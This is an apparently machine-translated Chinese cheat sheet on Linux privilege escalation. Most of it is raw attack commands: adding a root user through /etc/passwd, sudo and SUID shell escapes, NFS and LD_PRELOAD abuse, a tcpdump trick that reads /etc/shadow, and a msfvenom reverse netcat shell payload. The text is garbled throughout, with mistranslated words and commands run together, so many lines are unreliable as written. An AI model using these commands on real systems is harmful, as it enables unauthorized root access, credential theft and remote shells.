++可以看到可用用户++
添加用户(查看用户信息)==这里是正文==
条件:用户具有读/写/etc/passwd权限这里我用root考试测验
手动修正etc/passwd文件/etc/group文件中对其进行处理设置密码(图片来自网络侵删)由于我们在不该用adduser命令的情形下手动创建了一个新用户syst1m,因此在/etc/shadow文件中找不到任何有关信息。但是它在/etc/passwd文件中,此处符号已被加密密码值更换。通过这种办法,我们可以创建自己的用户以进行权限提升。
无法实行passwd命令设置用户密码1.Opensslopenssl passwd -1 -salt user3 pass1232.mkpasswdmkpasswd -m SHA-512 pass3.Pythonpython -c 'import crypt; print crypt.crypt("pass", "$6$salt")4.Perlperl -le 'print crypt("pass123", "abc")'5.PHPphp -r "print(crypt('aarti','123') . \"\n\");"修正号处的密码即可
配置缺点的NFS的Linux权限升级核心文件(/etc/exports,/etc/hosts.allow和/etc/hosts.deny.要配置弱的NFS做事器,只查看/etc/export文件)
环境配置(安装nfs)编辑/etc/exportetc/export文件
扫描NFS共享
1.NMAP
nmap -sV --script=nfs-showmount 192.168.1.1
2.showmount
利用NFS做事器进行提权技巧
1.Bash文件
2.C程序(来源互联网)
3.Nano/Vi(来源互联网)
4.Sudoers文件nano -p /etc/sudoersignite ALL=(ALL:ALL) NOPASSWD: ALL
通过自动脚本快速识别Windows系统上潜在的权限提升选项LinuEnumgit clone https://github.com/rebootuser/LinEnum.git
Linuxprivchecker(列举系统配置并运行一些权限提升检讨)wget http://www.securitysift.com/download/linuxprivchecker.py
Linux Exploit Suggester 2(返回可能的漏洞利用列表)
BasharkBeRootgit clone https://github.com/AlessandroZ/BeRoot.git
用于检讨常见的缺点配置,以找到提升权限的方法检讨文件权限SUID binNFS root压缩DockerSudo规则内核利用
./beroot.py
Cron操持任务Linux权限技巧环境
利用
Crontab Tar通配符注射
https://xz.aliyun.com/t/2401
利用SUID二进制文件进行Linux提权利用 "cp"进行提权第一种方法(复制passwd)1.探求具有SUID的文件
复制passwd
3.下载修正并让目标下载更换
第二种方法(传输后门)
天生反向连接(利用操持任务bash)msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.108 lport=1234 R
利用Find命令进行提权环境利用vim进行提权环境
利用==sudoers文件==
Other
nano修正passwd
运行suid脚本
老版本的nmap(2.02-5.21)nmap --interactivelshwhoamimsf exploit/unix/local/setuid_nmap
bashnash -pid
lessless /etc/passwd!/bin/sh
moremore /home/pelle/myfile!/bin/bash
AWk `awk 'BEGIN {system("/bin/bash")}`
manman passwd!/bin/bash
mantcpdumpecho $'id\ncat /etc/shadow' > /tmp/.testchmod +x /tmp/.testsudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
利用sudo进行Linux提权/etc/sudoers文件(sudo权限的配置文件)
检讨用户sudo权限sudo -l
传统分配root权限方法visudoraaz ALL=(ALL:ALL) ALL/raaz ALL=(ALL)ALLsudo suid
分配root权限默认方法visudoraaz ALL=ALL/raaz ALL=(root) ALLsudo su / sudo bash
技巧许可二进制命令的root权限raaz ALL=(root) NOPASSWD: /usr/bin/findsudo find /home -exec /bin/bash \;id
许可二进制程序的root权限raaz ALL= (root) NOPASSWD: /usr/bin/perl, /usr/bin/python, /usr/bin/less, /usr/bin/awk, /usr/bin/man, /usr/bin/vi
perlsudo perl -e 'exec "/bin/bash";'pythonsudo python -c 'import pty;pty.spawn("/bin/bash")lesssudo less /etc/hosts编辑器中输入!bash,按enter天生awksudo awk 'BEGIN {system("/bin/bash")}'mansudo man man编辑器中输入!bash,按enter天生visudo vi编辑器中输入!bash,按enter天生
许可shell脚本的root权限sudo /bin/script/asroot.pyid
许可其他程序的sudo权限raaz ALL=(ALL) NOPASSWD: /usr/bin/env, /usr/bin/ftp, /usr/bin/scp, /usr/bin/socat
环境天生shell
sudo env /bin/bashftpsudo ftp! /bin/bashwhoami
通过SCP天生shellscp SourceFile user@host:~/目录路径
## 利用LD_Preload提权
打开/etc/sudoersvisudotest ALL=(ALL:ALL) NOPASSWD: /usr/bin/findDefaults env_keep += LD_PRELOAD利用新建shell.c利用gcc编译实行## 利用通配符提权
星号匹配文件名中的任意数量的字符,包括无? 问号匹配任何单个字符[] 括号内包含一组字符,个中任何一个字符都可以匹配该位置的单个字符- []中利用的连字符表示字符范围〜 字符开头的~扩展为主目录的名称。将另一个用户的登录名附加到该字符中,它指的是该用户的主目录
在野通配符文件挟制示例1.文件所有者通过Chown挟制
普通用户root用户## 利用PATH变量进行提权
查看干系用户路径echo $PATH
PATH变量提权方法一demo.c权限提升
查见地式
1.echo天生root权限
复制命令
symlink命令